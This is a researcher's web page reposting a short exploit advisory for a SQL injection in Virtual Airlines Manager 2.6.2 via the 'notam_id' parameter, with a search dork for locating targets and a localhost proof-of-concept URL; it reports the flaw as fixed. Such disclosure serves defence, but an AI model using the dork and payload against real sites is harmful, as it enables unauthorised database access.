Search
  • Pankaj

Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection





# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection # Date: 2020-06-07 # Exploit Author: Pankaj Kumar Thakur # Vendor Homepage: http://virtualairlinesmanager.net/ # Dork: inurl:notam_id= # Affected Version: 2.6.2 # Tested on: Ubuntu # CVE : N/A Vulnerable parameter ------------------- notam_id=%27%27 Id parameter's value is going into sql query directly! Proof of concept --------------- https://localhost:8080/vam/index.php?page=notam&notam_id=11%27%27 Submitted: Jun 1 2020 Fixed: Jun 5 2020 Acknowledgement : https://ibb.co/Y3WYdFN


45 views
CONTACT ME

Pankaj Thakur

Security Researcher | CEH | OSCP

Email:

pankajbtechit@gmail.com 

 

Address:

New Baneshwor, Kathmandu

Nepal, 44600

  • Black LinkedIn Icon
  • Black Twitter Icon

© 2019 by Pankaj